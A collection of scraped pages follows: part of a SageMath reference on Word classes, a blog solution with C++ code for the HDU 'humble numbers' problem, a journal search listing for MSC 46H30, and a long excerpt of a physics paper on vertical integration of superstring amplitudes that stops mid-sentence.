algorithm using the RSK_data option: sage: p = Tableau([[1,2,2],[3]]); q = Tableau([[1,2,4],[3]]) sage: Word(RSK_data=[p, q]) word: 1322 TESTS: sage: Word(5) Traceback (most recent call last): ... ValueError: Cannot guess a datatype from data (=5); please specify one sage: W = Words() sage: w = W('abc') sage: w is W(w) True sage: w is Word(w, alphabet='abc') False class sage.combinat.words.word.Word_iter(parent, iter, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter, sage.combinat.words.abstract_word.Word_class Word of unknown length (finite or infinite) represented by an iterable. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Words behave like a Python list : they can be sliced using square braquets to define for example a prefix or a factor. EXAMPLES: sage: w = Word(iter([1,1,4,9]*1000), length='unknown', caching=False) sage: w word: 1149114911491149114911491149114911491149... sage: w.delta() word: 2112112112112112112112112112112112112112... TESTS: sage: w = Word(iter('abcd'*100), length='unknown', caching=False) sage: type(w) <class 'sage.combinat.words.word.Word_iter'> sage: w word: abcdabcdabcdabcdabcdabcdabcdabcdabcdabcd... Pickle is not supported for word of unknown length defined by an iterator: sage: dumps(w) Traceback (most recent call last): ... PicklingError: Can't pickle <type 'generator'>: attribute lookup __builtin__.generator failed class sage.combinat.words.word.Word_iter_with_caching(parent, iter, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter_with_caching, sage.combinat.words.abstract_word.Word_class Word of unknown length (finite or infinite) represented by an iterable (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Words behave like a Python list : they can be sliced using square braquets to define for example a prefix or a factor. EXAMPLES: sage: w = Word(iter([1,2,3]*1000), length='unknown') sage: w word: 1231231231231231231231231231231231231231... sage: w.finite_differences(mod=2) word: 1101101101101101101101101101101101101101... TESTS: sage: w = Word(iter('abcd'*100), length='unknown') sage: type(w) <class 'sage.combinat.words.word.Word_iter_with_caching'> sage: w word: abcdabcdabcdabcdabcdabcdabcdabcdabcdabcd... Pickle is not supported for word of unknown length defined by an iterator: sage: dumps(w) Traceback (most recent call last): ... PicklingError: Can't pickle <type 'generator'>: attribute lookup __builtin__.generator failed Infinite word Next topic A collection of constructors of common words
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.20328594744205475, "perplexity": 24791.02766889528}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-41/segments/1410657133485.50/warc/CC-MAIN-20140914011213-00011-ip-10-196-40-205.us-west-1.compute.internal.warc.gz"}
https://www.oyohyee.com/post/HDU/1058/
577 # 题目 ## Description A number whose only prime factors are 2,3,5 or 7 is called a humble number. The sequence 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 14, 15, 16, 18, 20, 21, 24, 25, 27, ... shows the first 20 humble numbers. Write a program to find and print the nth element in this sequence ## Input The input consists of one or more test cases. Each test case consists of one integer n with 1 <= n <= 5842. Input is terminated by a value of zero (0) for n. ## Output For each test case, print one line saying "The nth humble number is number.". Depending on the value of n, the correct suffix "st", "nd", "rd", or "th" for the ordinal number nth has to be used like it is shown in the Sample Output. 1 2 3 4 11 12 13 21 22 23 100 1000 5842 0 ## Sample Output The 1st humble number is 1. The 2nd humble number is 2. The 3rd humble number is 3. The 4th humble number is 4. The 11th humble number is 12. The 12th humble number is 14. The 13th humble number is 15. The 21st humble number is 28. The 22nd humble number is 30. The 23rd humble number is 32. The 100th humble number is 450. The 1000th humble number is 385875. The 5842nd humble number is 2000000000. # 题解 **>丑数<** stndrdth 花的时间比丑数都多…… # 代码 /* By:OhYee Github:OhYee HomePage:http://www.oyohyee.com Email:[email protected] かしこいかわいい? エリーチカ! */ #include <cstdio> #include <algorithm> #include <cstring> #include <cmath> #include <string> #include <iostream> #include <vector> #include <list> #include <queue> #include <stack> #include <map> #include <set> using namespace std; const int maxn = 5843; int dp[maxn]; char *c[] = {"","st","nd","rd"}; bool Do() { int n; scanf("%d",&n); if(n == 0) return false; char t[3]="th"; if(n % 10 == 1 && n % 100 != 11) t[0] = 's',t[1]='t'; else if(n % 10 == 2 && n % 100 != 12) t[0] = 'n',t[1] = 'd'; else if(n % 10 == 3 && n % 100 != 13) t[0] = 'r',t[1] = 'd'; printf("The %d%s humble number is %d.\n",n,t,dp[n]); return true; } int main() { int i1 = 1,i2 = 1,i3 = 1,i4 = 1; int n = 1; dp[1] = 1; while(n < maxn) { dp[++n] = min(min(2 * dp[i1],3 * dp[i2]),min(5 * dp[i3],7 * dp[i4])); if(dp[n] == 2 * dp[i1]) i1++; if(dp[n] == 3 * dp[i2]) i2++; if(dp[n] == 5 * dp[i3]) i3++; if(dp[n] == 7 * dp[i4]) i4++; } while(Do()); return 0; } • 点击查看/关闭被识别为广告的评论
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2640382945537567, "perplexity": 7290.444012723716}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573098.0/warc/CC-MAIN-20190917161045-20190917183045-00485.warc.gz"}
http://cms.math.ca/cjm/msc/46H30?fromjnl=cjm&jnl=CJM
location:  Publications → journals Search results Search: MSC category 46H30 ( Functional calculus in topological algebras [See also 47A60] ) Expand all        Collapse all Results 1 - 2 of 2 1. CJM 2015 (vol 67 pp. 759) Carey, Alan L; Gayral, Victor; Phillips, John; Rennie, Adam; Sukochev, Fedor Spectral Flow for Nonunital Spectral Triples We prove two results about nonunital index theory left open in a previous paper. The first is that the spectral triple arising from an action of the reals on a $C^*$-algebra with invariant trace satisfies the hypotheses of the nonunital local index formula. The second result concerns the meaning of spectral flow in the nonunital case. For the special case of paths arising from the odd index pairing for smooth spectral triples in the nonunital setting we are able to connect with earlier approaches to the analytic definition of spectral flow. Keywords:spectral triple, spectral flow, local index theoremCategory:46H30 2. CJM 2007 (vol 59 pp. 3) Biller, Harald Holomorphic Generation of Continuous Inverse Algebras We study complex commutative Banach algebras (and, more generally, continuous inverse algebras) in which the holomorphic functions of a fixed $n$-tuple of elements are dense. In particular, we characterize the compact subsets of~$\C^n$ which appear as joint spectra of such $n$-tuples. The characterization is compared with several established notions of holomorphic convexity by means of approximation conditions. Keywords:holomorphic functional calculus, commutative continuous inverse algebra, holomorphic convexity, Stein compacta, meromorphic convexity, holomorphic approximationCategories:46H30, 32A38, 32E30, 41A20, 46J15 top of page | contact us | privacy | site map |
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8666347861289978, "perplexity": 2228.6963149695393}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-36/segments/1471982293922.13/warc/CC-MAIN-20160823195813-00280-ip-10-153-172-175.ec2.internal.warc.gz"}
https://www.arxiv-vanity.com/papers/1710.07232/
April 4, 2021 Vertical Integration from the Large Hilbert Space Theodore Erler111, Sebastian Konopka222 Institute of Physics of the ASCR, v.v.i. Na Slovance 2, 182 21 Prague 8, Czech Republic Abstract We develop an alternative description of the procedure of vertical integration based on the observation that amplitudes can be written in BRST exact form in the large Hilbert space. We relate this approach to the description of vertical integration given by Sen and Witten. ## 1 Introduction and Summary Computing a superstring scattering amplitude requires inserting a configuration of picture changing operators (PCOs) for each Riemann surface contributing to the amplitude. A choice of PCOs roughly corresponds to a section of a fiber bundle: The base of the fibre bundle consists of the moduli space of Riemann surfaces with the relevant genus, spin structure, and number of punctures, and the fiber at each point consists of copies of the Riemann surface with the corresponding value of the moduli; this parameterizes the possible ways of inserting PCOs on that surface. The worldsheet path integral defines a measure on this fiber bundle which can be pulled back to any submanifold; in particular, pulling the measure back onto a section of the fiber bundle and integrating defines a superstring amplitude with a prescribed configuration of PCOs on each Riemann surface. A significant complication with this procedure, however, is the appearance of spurious singularities in the superstring measure [1]. One can try to look for a global section which avoids spurious singularities everywhere, but this may be inconvenient in practice, or there may be an obstruction to the existence of such a global section.333It is known that the supermoduli space of super-Riemann surfaces cannot be holomorphically projected down to the ordinary (bosonic) moduli space of Riemann surfaces [2]. To our knowledge, the implications of this fact from the point of view of PCOs has not been worked out, but one possibility is that the PCO positions cannot be chosen globally as holomorphic functions of the moduli. A remedy proposed by Sen [3], and later made more explicit by Sen and Witten [4], is to divide the moduli space into regions so that on each region we can choose a local section which avoids spurious poles. Simply adding the contributions from the local sections together, however, does not define a gauge invariant amplitude. To correct for this, at the interface between the different regions of the moduli space we must integrate “along the fiber” to connect local sections—that is, one must deform one choice of PCOs into another while keeping the moduli fixed. This is called vertical integration. The amplitude is then defined by a closed integration cycle in the fiber bundle composed of local sections connected by “vertical segments.” Importantly, the nature of the superstring measure implies that spurious singularities can be rendered harmless on the vertical segments. Therefore we can obtain gauge invariant amplitudes free from unphysical divergences in the measure. In this paper we investigate a different, more algebraic, approach to this problem, motivated by recent studies of superstring field theories [5, 6]. Consider an -point amplitude expressed as an -fold bra state: ⟨Ap|: H⊗n→C, (1.1) where is a CFT vector space containing BRST invariant physical states. The superscript indicates that the amplitude contains picture changing operators inserted in some way on the constituent Riemann surfaces. Gauge invariance of the amplitude is equivalent to the statement that this bra state is annihilated by a sum of BRST operators acting on each external state: ⟨Ap|(Q⊗I⊗n−1+...+I⊗n−1⊗Q)=0. (1.2) Here denotes the BRST operator and is the identity operator on . It is well-known that the cohomology of is trivial in the “large Hilbert space” introduced by Friedan, Martinec, and Shenker [7], that is, the CFT state space obtained by bosonizing the ghosts into the system and allowing for states which depend on the zero mode of the ghost. This implies that the amplitude can be expressed in the form ⟨Ap|=⟨αp|(Q⊗I⊗n−1+...+I⊗n−1⊗Q). (1.3) We will call the -fold bra state a gauge amplitude, following the terminology of [6]. The gauge amplitude lives in the large Hilbert space. However, the physical amplitude must reside in the “small Hilbert space” where the zero mode of the ghost is absent. This requires that the amplitude satisfies ⟨Ap|(η⊗I⊗n−1+...+I⊗n−1⊗η)=0, (1.4) where denotes the zero mode of the eta ghost. This is consistent with (1.3) provided that the object ⟨αp|(η⊗I⊗n−1+...+I⊗n−1⊗η) (1.5) is annihilated by the BRST operator. Since carries picture , it is natural to interpret this object as an amplitude containing one fewer PCO insertion: ⟨αp|(η⊗I⊗n−1+...+I⊗n−1⊗η)=⟨Ap−1|. (1.6) We can now apply this procedure again, expressing as the BRST variation of a gauge amplitude , and apply once again to arrive at an amplitude containing two fewer PCO insertions. Continuing this process unfolds a hierarchy of amplitudes and gauge amplitudes: ⟨Ap| =⟨αp|(Q⊗I⊗n−1+...+I⊗n−1⊗Q) ⟨Ap−1| =⟨αp|(η⊗I⊗n−1+...+I⊗n−1⊗η) ⟨Ap−1| =⟨αp−1|(Q⊗I⊗n−1+...+I⊗n−1⊗Q) ⋮ ⟨A1| =⟨α2|(η⊗I⊗n−1+...+I⊗n−1⊗η) ⟨A1| =⟨α1|(Q⊗I⊗n−1+...+I⊗n−1⊗Q) ⟨A0| =⟨α1|(η⊗I⊗n−1+...+I⊗n−1⊗η), (1.7) where at the end we obtain an amplitude containing no PCO insertions at all.444The number of PCO insertions in is determined by the requirement that the amplitude is nonzero acting on NS states at picture and Ramond states at picture . This means that the amplitudes with fewer than PCO insertions will need to act on states with nonstandard picture to obtain a nonzero result. Generally, such amplitudes will encounter divergences from spurious singularities. We discuss such amplitudes formally, as intermediate objects used to obtain the final amplitude which is gauge invariant and free from spurious singularity. The structure here is reminiscent of descent equations which appear in analysis of anomalies in gauge theories [8]. This leads the following procedure for deriving gauge invariant amplitudes. First we start with the amplitude , and insert the operator at some point on each constituent Riemann surface. This defines the gauge amplitude . We then take the BRST variation to arrive at the amplitude containing one PCO. We then insert another on the Riemann surfaces of to derive , and continue in this way until we arrive at the amplitude containing PCO insertions. The crucial point is that the insertions of do not need to vary continuously with the moduli to ensure gauge invariance. Gauge invariance is automatic since the final amplitude is expressed in BRST exact form. We may therefore allow the insertions to “jump” across spurious poles discontinuously as a function of the moduli to avoid unphysical divergences. The primary goal of this work is to show that the above algebraic procedure gives a viable alternative to defining a consistent measure on the moduli space for superstring amplitudes. The approach has some advantages. The computation of vertical corrections is arguably simpler and more flexible, and certain essential properties, such as gauge invariance of the amplitude and independence from various choices, are evident from the nature of the construction. A second goal of our work will be understanding the relationship between the algebraic approach and the conceptually rather different idea of vertical integration. Our motivation is to form a link between Sen’s discussion of superstring field theories [9] and other techniques which have been independently developed based on the large Hilbert space [5, 6, 10]. As investigations continue into quantum effects in superstring field theories [11, 12], and in the geometrical formulation based on super-Riemann surfaces [13], it may be useful to have an understanding of the relationship between these approaches. Vertical integration is a general idea which can be implemented in many ways. To give ourselves a concrete objective, we will focus on the connection to the vertical integration procedure as implemented by Sen and Witten [4]. In the spirit of that work, we discuss only on-shell amplitudes and ignore the fact that the moduli space of Riemann surfaces is noncompact. The boundary of moduli space is associated with the infrared physics of superstring perturbation theory, about which there has been extensive discussion in recent years. One way of dealing with infrared divergences is to extend amplitudes off-shell using the formalism of string field theory. Suffice it to say that our discussion can be easily adapted in this context, which provided part of the motivation for this work. For simplicity we discuss PCOs in the holomorphic sector only, as would be relevant for the heterotic string. For type II strings we have a similar story also in the antiholomorphic sector. This paper is organized as follows. In section 2 we review the definition of superstring measure in the PCO formalism. In section 3 we describe the algebraic construction of superstring amplitudes, deriving a set of recursive equations for the vertical corrections at the interface between local sections needed to ensure gauge invariance. We give examples and prove that on-shell amplitudes are independent of the choice of vertical corrections derived by this procedure. In section 4 we discuss the construction of Sen and Witten. To give a clear formalization of their procedure, we employ an analogue of differential forms on the lattice, called difference forms. The Sen-Witten vertical corrections are defined by “integration” of a discretized measure—characterized by difference forms—over a collection of links in a -dimensional cubical lattice, where is the number of PCOs in the amplitude. The sites of the lattice correspond to combinations of PCOs taken from adjoining local sections, and the collection of links which define the “integration cycle” are called lattice chains. We describe how vertical corrections of this form may be constructed from the algebraic point of view. The algebraic construction introduces a collection of auxiliary amplitudes containing PCOs whose vertical corrections are characterized by lattice chains inside lower dimensional lattices of respective dimension . The algebraic construction functions by extending lattice chains from lower dimensional into higher dimensional lattices in such a way as to be consistent with gauge invariance and so that the chains of higher dimensional lattices project down to the chains of lower dimensional lattices. We conclude with some examples. ## 2 Superstring Measure In this section we review the superstring measure in the PCO formalism [3]. The purpose is to fix a convenient notation for our calculations and to simplify some signs. Given a Riemann surface with genus and punctures, we can remove disks around each puncture and cut what remains into components with the topology of a sphere with three holes. We cover the disks with holomorphic local coordinates with . The origin of these coordinates corresponds to the location of the punctures on the Riemann surface. On the spheres we introduce holomorphic coordinates . The Riemann surface can be reconstructed by gluing the boundaries of these components with holomorphic transition functions: zi =fij(zj) (2.1) zi =fa(wa). (2.2) The transition functions exist between coordinates which are identified by the gluing, and encode all information about the moduli of the Riemann surface. Since we work with the heterotic string, we are interested in the moduli space of Riemann surfaces with spin structure in the leftmoving sector. This is a -fold covering of the bosonic moduli space which comes in two disconnected components, representing the even and odd spin structures. We use to denote one of these disconnected components. That is, is the moduli space of genus Riemann surfaces with punctures together with either an even or odd spin structure, and denotes a point in this moduli space. Given transition functions , we may define an -fold bra state called a surface state ⟨Σ|:H⊗n→C. (2.3) The surface state is defined so that the quantity ⟨Σ|Φ1⊗...⊗Φn (2.4) represents a correlation function on a Riemann surface assembled with the transition functions , with the vertex operators corresponding to the states inserted at the punctures in the respective coordinates . If the vertex operators are conformally invariant, the correlation function only depends on the transition functions through the moduli of the Riemann surface they represent. For generic vertex operators, the surface state will depend more nontrivially on the choice of transition functions. The surface state is BRST invariant: ⟨Σ|Q=0. (2.5) Since this will not cause confusion, we use a shorthand notation where represents a sum of BRST operators acting on each state: Q → Q⊗I⊗n−1+...+I⊗n−1⊗Q. (2.6) In particular represents a correlation function with a contour integral of the BRST current surrounding all punctures. If we deform the contour inside the surface and shrink to a point, this gives zero. Also important for our discussion is the fact that is well-defined in the small Hilbert space. This implies that it is annihilated by the zero mode of the eta ghost: ⟨Σ|η=0, (2.7) where denotes a sum of eta zero modes acting on each state. Let us first describe the measure without PCOs, as would be relevant for computing amplitudes in bosonic string theory. We fix a choice of surface state for each point in the moduli space, and write simply as , leaving the dependence on moduli implicit. To define differential forms that can be integrated over the moduli space, we need to insert the appropriate -ghosts inside correlation functions. Using the idea of the Schiffer variation, following [14], we may express the -ghost insertions as contour integrals surrounding the punctures. Around the th puncture we have a -ghost insertion of the form b(v(a)μ)=∮dwa2πiv(a)μ(m,wa)b(wa)+∮d¯wa2πi¯v(a)μ(m,¯wa)¯b(¯wa), (2.8) where the contours are oriented counterclockwise respectively in the and coordinates on the Riemann surface. The contour integrals are weighted by functions called Schiffer vector fields. The lower index corresponds to coordinates on the moduli space, with . We introduce the operator Tμ ≡(∮dw12πiv(1)μ(m,w1)T(w1))⊗I⊗n−1+...+I⊗n−1⊗(∮dwn2πiv(n)μ(m,wn)T(wn)) (2.9) +(∮d¯w12πi¯v(1)μ(m,¯w1)¯T(¯w1))⊗I⊗n−1+...+I⊗n−1⊗(∮d¯wn2πi¯v(n)μ(m,¯wn)¯T(¯wn)). The Schiffer vector fields are defined so that the following equation holds: ∂∂mμ⟨Σ|=−⟨Σ|Tμ. (2.10) Additional properties are [Q,bμ] =Tμ (2.11) [Tμ,bν] =∂∂mμbν−∂∂mνbμ, (2.12) where is defined as in (2.9) with the energy momentum tensor replaced by the -ghost, and represents a graded commutator with respect to Grassmann parity. Let be coordinate 1-forms on the moduli space, and introduce operator-valued 1-forms: T ≡dmμTμ, (2.13) b ≡dmμbμ. (2.14) To simplify signs, we assume that the coordinate 1-forms are uniformly Grassmann odd objects, so they anticommute through each other and also though Grassmann odd worldsheet operators. In this convention, the operator is Grassmann odd, and is Grassmann even. The identities (2.10)-(2.12) imply d⟨Σ| =−⟨Σ|T (2.15) [Q,b] =−T (2.16) db =12[T,b], (2.17) where d=dmμ∂∂mμ (2.18) is the exterior derivative on the moduli space. The measure for scattering amplitudes can then be expressed ⟨Ω|=⟨Σ|eb. (2.19) This is a differential form of inhomogeneous degree. In particular, the operator is defined by the series expansion eb=I⊗n+b+12!b2+...+1(6g+2n−6)!b6g+2n−6. (2.20) The series terminates since there are only independent 1-forms . The last term is a top degree form, and this is the part of the measure that should be integrated over the moduli space to obtain the amplitude. Using the identities (2.15)-(2.17), it is straightforward to show that ⟨Ω|Q=−d⟨Ω|. (2.21) Assuming we can ignore contributions from the boundaries of moduli space, this implies that BRST trivial states decouple from scattering amplitudes. The measure , however, can only compute superstring scattering amplitudes between states of nonstandard picture. Such amplitudes will typically suffer from unphysical divergences due to spurious singularities. Therefore, it is useful to generalize the measure to accommodate correlation functions containing additional operator insertions, in particular PCOs. One concrete way to do this is as follows.555In the description of [3], PCOs are inserted in the coordinates representing the Riemann surface with the disks around the punctures removed. In this approach, the Schiffer vector fields must be chosen to vanish at the location of the PCOs in order to ensure that deformations of the moduli are independent from deformations of the PCO positions in the coordinates . This is equivalent to the approach we take, but expressed in a different coordinate system on the Riemann surface. Suppose we have a correlation function including operators , in addition to the vertex operators representing the external states. We remove a disk from the Riemann surface containing the location of all operators , but no vertex operators. We fix a coordinate system on this disk denoted with , so that each operator has a corresponding position in this coordinate system. For short we write the complete set of operator insertions as Op=O1(y1)...Op(yp), (2.22) where the upper index indicates the number of operator insertions. We build the remaining part of the Riemann surface by removing disks around the punctures, covered by coordinates with and corresponding to the location of the punctures. Including the disk , the surface now has holes; we cut what remains into components with the topology of a sphere with three holes, and introduce coordinates on these components. The Riemann surface may be reconstructed by specifying transition functions between coordinates identified by gluing: zi =fij(zj) (2.23) zi =fa(wa) (2.24) zi =f(y). (2.25) Note that at this level the coordinate is on the same footing as the coordinates , but the coordinate will play a distinct role in defining the measure. From the transition functions we define a surface state acting on copies of : ⟨Σ′|:H⊗n+1→C. (2.26) We use the prime to indicate that acts on states, including a state represented by the coordinate . Assuming that the first copy of represents operators inserted in the coordinate , we may then represent correlation functions containing operators through the -fold bra state ⟨Σ′|(Op|0⟩)⊗I⊗n. (2.27) Suppose that for every point in the moduli space we chose transition functions building a Riemann surface with moduli . From this we can define a surface state for every ; we write simply as , leaving the dependence on implicit. We assume that the transition functions have been defined so that the coordinate covers all parts of each Riemann surface where we care to insert . Note that the moduli space carries information about the location of the punctures represented by the coordinates , but does not carry information about the coordinate . We introduce a collection of Schiffer vector fields and defined so that the analogue of (2.15)-(2.17) hold: d⟨Σ′| =−⟨Σ|T′ (2.28) [Q,b′] =−T′ (2.29) db′ =12[T′,b′], (2.30) where b′≡dmμb′μ (2.31) and b′μ ≡(∮dy2πivμ(m,y)b(y))⊗I⊗n+I⊗(∮dw12πiv(1)μ(m,w1)b(w1))⊗I⊗n−1+...+I⊗n⊗(∮dwn2πiv(n)μ(m,wn)b(wn)) With this we define the measure with operator insertions as (2.33) We label the measure according to the operator insertions it contains. It is useful to think of the measure as a differential form on a fiber bundle . The base of consists of the moduli space of genus Riemann surfaces with punctures together with an even or odd spin structure, and are coordinates on the base. The fiber at the point consists of copies of the Riemann surface with the corresponding value of the moduli, and are coordinates on the fiber. We introduce coordinate 1-forms on the fiber and define the exterior derivative on : d=dmμ∂∂mμ+dyi∂∂yi+d¯yi∂∂¯yi. (2.34) We assume that are uniformly Grassmann odd objects which anticommute with each other, the s, and Grassmann odd worldsheet operators. Using the identities (2.28)-(2.30), it is straightforward to show that the generalization of (2.21) in the presence of operator insertions takes the form (2.35) where now includes differentiation along the fiber directions. On the right hand side, represents a sum of operator insertions (Q−d)Op (2.36) −(dO1(y1))...Op(yp)−...−(−1)O1+...+Op−1O1(z1)...(dOp(yp)), and, for example dO1(y1)=dy1∂O1(y1)+d¯y1¯∂O1(y1). (2.37) Also important in our discussion is the property (−1)Op⟨Ω,Op|η=−⟨Ω,ηOp|, (2.38) where represents a sum of operator insertions ηOp=(ηO1(y1))...Op(yp)+...+(−1)O1+...+Op−1O1(y1)...(ηOp(yp)). (2.39) This is nonzero only if contains some operators in the large Hilbert space. The measure which is relevant for computing superstring scattering amplitudes in the PCO formalism is ⟨Ω,Xp|, (2.40) where refers to a collection of operator insertions of the form Xp≡[X(y1)−dξ(y1)] ... [X(yp)−dξ(yp)], (2.41) and is a picture changing operator. If the number of insertions is chosen appropriately, we obtain nonvanishing correlation functions with Neveu-Schwarz and Ramond external states at the standard pictures and . The measure is defined in the small Hilbert space: ⟨Ω,Xp|η=0. (2.42) Furthermore, since X(y)−dξ(y)=(Q−d)ξ(y), (2.43) we have the property ⟨Ω,Xp|Q=−d⟨Ω,Xp|. (2.44) The second term in (2.35) drops out since squares to zero. Therefore, the superstring measure produces a total derivative on the fiber bundle when acting on BRST trivial states. Naively, we can define a gauge invariant amplitude by integrating the pullback of the superstring measure on a global section of . The difficulty, however, is in finding a global section of which avoids spurious singularities in the measure. However, it is always possible to find sections of which avoid spurious singularities locally. We can then attempt to define the amplitude by summing contributions from local sections on disjoint regions of moduli space which avoid spurious poles. Generally there will be discontinuities in the choice of PCOs between disjoint regions, and the amplitude will require additional contributions—the “vertical corrections”—to cancel boundary terms between different regions when the amplitude contains BRST trivial states. The vertical corrections can be seen to arise from integrating the superstring measure “along the fiber” at junctions between different regions of the moduli space so as to join local sections into a closed integration cycle in . This is vertical integration. Next we describe the algebraic approach to the PCO formalism, where the origin of vertical corrections is somewhat different. ## 3 Algebraic Approach In the algebraic approach outlined in the introduction, PCOs are derived by repeatedly inserting in the measure followed by application of the BRST operator. If the location of is not a continuous function of the moduli, (2.35) implies that the BRST operator produces boundary terms from the integration over moduli space at the locus of discontinuities. These boundary terms are the vertical corrections. We assume that the moduli space is decomposed into regions where the location of varies continuously as a function of the moduli: M=∪αMα. (3.1) The contribution to the amplitude from will turn out to be the pullback of the superstring measure on a local section of defined on . To connect with the discussion of [4], we assume that the regions form closed polyhedra which are glued along their faces in such a way as to define a dual triangulation of . However, it should be clear that the general procedure applies regardless of the choice of decomposition of the moduli space. By definition, all faces of codimension in a dual triangulation appear at the junction between distinct polyhedra. We will write for the codimension face at the junction of distinct polyhedra , so we have codimension 0: Mα codimension 1: Mαβ=Mα∩Mβ,   α,β distinct codimension 2: Mαβγ=Mα∩Mβ∩Mγ    α,β,γ distinct ⋮ ⋮  . (3.2) See figure 3.1. If the intersection of the polyhedra is empty, we assume that is the empty set. The faces and are equal as sets, but it is useful to consider them as having opposite orientations as integration cycles in the moduli space. More generally, we assume that ∫M...αi...αj...=−∫M...αj...αi.... (3.3) In this sense, is totally antisymmetric in the indices . In particular, is the empty set if any two indices are equal. Fixing an orientation on the moduli space induces an orientation on the polyhedra, and the orientation of the higher codimension faces will be determined by ∫∂Mα0...αk=−∑β∫Mα0...αkβ. (3.4) In this setup we can formulate a useful version of Stokes’ theorem. Suppose on each codimension face we have a differential form which is antisymmetric in the indices . Stokes’ theorem implies 1(k+1)!∑α0...αk∫Mα0...αkdωα0...αk=1(k+2)!∑α0...αk+1∫Mα0...αk+1(δω)α0...αk+1. (3.5) We introduce an operation , which acts on an object with antisymmetric indices to produce an object with antisymmetric indices . It is defined as (δω)α0...αk+1=k+1∑n=0(−1)nωα0...ˆαn...αk+1, (3.6) where the hat over the index indicates omission. The operation is nilpotent, δ2=0, (3.7) and is related to the Čech coboundary operator. ### 3.1 The Construction We propose to express the amplitude in the form666Since refers to only one connected component of the moduli space of Riemann surfaces with spin structure, technically only gives the contribution to the total amplitude coming from either the even or the odd spin structures. Since the location of spurious poles depends on the spin structure, in general we must adjust the choice of dual triangulation, local sections, and vertical corrections separately for the even and odd spin structures. The complete amplitude is then given by adding these contributions. ⟨Ap|=∑α∫Mα⟨Ω,Xpα|+12!∑αβ∫Mαβ⟨Ω,Xpαβ|+13!∑αβγ∫Mαβγ⟨Ω,Xpαβγ|+... . (3.8) The first term is the contribution to the amplitude from the pullback of the superstring measure (2.40) onto local sections of on each polyhedron. The operator insertions in the first term are given by Xpα=[X(y1α(m))−dξ(y1α(m))] ... [X(ypα(m))−dξ(ypα(m))], (3.9) where the points parameterize the location of the PCOs as a function of , and characterize the local section of . The remaining terms in the amplitude are the vertical corrections, and can be arranged hierarchically according to the codimension of the faces in the dual triangulation. The vertical corrections are defined by integrating a measure over the face of the dual triangulation, where denotes a collection of operator insertions whose positions are prescribed functions of . The insertions are defined to be antisymmetric in the indices , and for even (odd) codimension the insertions are Grassmann even (odd). Generally, will be expressed through combinations of and , and the goal of the present discussion is to determine what form the insertions take. The central condition characterizing the vertical corrections is that they lead to a gauge invariant amplitude. From (2.35) we know that (−1)k⟨Ω,Xpα0...αk|Q=−d⟨Ω,Xpα0...αk|−⟨Ω,(Q−d)Xpα0...αk∣∣. (3.10) Using Stokes’ theorem (3.5), gauge invariance implies that the operator insertions satisfy (Q−d)Xpα0...αk−(δXp)α0...αk=0(. (3.11) The operator acts on the insertions corresponding to the faces of one fewer codimension: (δXp)α0...αk=k∑n=0(−1)nXpα0...ˆαn...αk. (3.12) All terms in (3.11) are evaluated at a common point . To solve (3.11), we propose that the physical amplitude can be expressed as the BRST variation of a gauge amplitude: ⟨Ap|=⟨αp|Q. (3.13) The gauge amplitude is expressed in a form analogous to (3.8): ⟨αp|=∑α∫Mα⟨Ω,Ξpα|−12!∑αβ∫Mαβ⟨Ω,Ξpαβ|+13!∑αβγ∫Mαβγ⟨Ω,Ξpαβγ|−... . (3.14) For convenience, we take the signs in this series to alternate. On each face of the dual triangulation we have a measure defined by a collection of operator insertions . The insertions are antisymmetric in the indices , and for even (odd) codimension they are Grassmann odd (even). Typically, the insertions depend on the zero mode of the ghost. Taking the BRST variation of the gauge amplitude gives a formula for the insertions : 